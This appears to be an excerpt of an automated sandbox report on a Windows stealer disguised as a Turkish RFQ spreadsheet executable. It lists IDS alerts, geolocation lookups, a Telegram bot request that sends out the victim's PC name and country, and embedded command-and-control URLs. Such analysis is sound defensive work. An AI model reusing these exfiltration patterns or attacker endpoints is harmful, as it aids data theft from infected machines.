                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878164%0D%0ADate%20and%20Time:%2014/03/2025%20/%2010:04:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878164%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878164%0D%0ADate%20and%20Time:%2014/03/2025%20/%2010:34:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878164%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49723 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49716 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49710 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49719 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49725 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49724 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49722 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49715 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49720 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49713 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49718 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878164%0D%0ADate%20and%20Time:%2014/03/2025%20/%2010:04:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878164%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878164%0D%0ADate%20and%20Time:%2014/03/2025%20/%2010:34:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878164%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 12:08:40 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 12:08:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003393000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003385000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003372000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003051000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003393000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003385000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003372000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003051000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3663189438.00000000066D0000.00000004.00000020.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: svchost.exe, 00000008.00000002.2862465003.000001A3A2800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: svchost.exe, 00000008.00000003.1206544234.000001A3A2698000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: svchost.exe, 00000008.00000003.1206544234.000001A3A2698000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: svchost.exe, 00000008.00000003.1206544234.000001A3A2698000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: svchost.exe, 00000008.00000003.1206544234.000001A3A26CD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003393000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003385000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003372000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003051000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1206895756.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 00000009.00000002.1253257144.0000000002431000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
